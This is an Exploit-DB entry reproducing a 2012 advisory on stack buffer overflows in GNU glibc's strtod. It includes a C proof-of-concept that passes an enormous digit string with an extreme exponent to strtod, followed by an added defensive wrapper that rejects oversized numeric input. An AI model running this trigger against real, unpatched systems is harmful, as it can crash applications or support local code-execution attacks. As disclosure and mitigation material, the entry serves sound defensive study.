GNU glibc – Multiple Local Stack Buffer Overflow Vulnerabilities

  • Author: Joseph S. Myer
    Date: 2012-08-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/37631/
  • // source: https://www.securityfocus.com/bid/54982/info
    
    GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.
    
    Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. 
    
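    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Exponent field appended after the digit run. */
    #define EXPONENT "e-2147483649"
    /* Number of '0' digits following the leading '1'. */
    #define SIZE 214748364

    int
    main (void)
    {
      /* Room for '1', SIZE zeros, and EXPONENT including its NUL. */
      char *p = malloc (1 + SIZE + sizeof (EXPONENT));
      if (p == NULL)
        {
          perror ("malloc");
          exit (EXIT_FAILURE);
        }
      p[0] = '1';
      memset (p + 1, '0', SIZE);
      memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
      /* The oversized decimal string is handed to strtod here. */
      double d = strtod (p, NULL);
      printf ("%a\n", d);
      exit (EXIT_SUCCESS);
    }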
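
A caller-side guard for applications that parse untrusted numeric strings, as an added example that is not part of the original advisory or of glibc: it refuses input longer than a fixed limit before it reaches strtod, and checks the end pointer and errno afterwards. The names safe_strtod and MAX_NUMERIC_LEN are hypothetical and the limit of 512 is an assumption.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed limit, not from the advisory: longest numeric string accepted. */
#define MAX_NUMERIC_LEN 512

/* Hypothetical wrapper: 0 on success with the value in *out, -1 on reject. */
int
safe_strtod (const char *s, double *out)
{
  if (s == NULL || out == NULL)
    return -1;

  /* Look for the terminator within the limit only, so an oversized
     buffer is neither scanned to its end nor passed on to strtod. */
  const char *nul = memchr (s, '\0', MAX_NUMERIC_LEN + 1);
  if (nul == NULL || nul == s)
    return -1;                  /* too long, or empty */

  char *end = NULL;
  errno = 0;
  double v = strtod (s, &end);
  if (end == s || *end != '\0')
    return -1;                  /* no number parsed, or trailing bytes */
  if (errno == ERANGE)
    return -1;                  /* overflow or underflow */

  *out = v;
  return 0;
}

int
main (void)
{
  /* Constructed input: same shape as the test case above, scaled down. */
  static char big[4096];
  big[0] = '1';
  memset (big + 1, '0', sizeof big - 16);
  strcpy (big + sizeof big - 15, "e-2147483649");

  double v;
  printf ("oversized: %d\n", safe_strtod (big, &v));
  if (safe_strtod ("1.5e3", &v) == 0)
    printf ("1.5e3 -> %g\n", v);
  return 0;
}
```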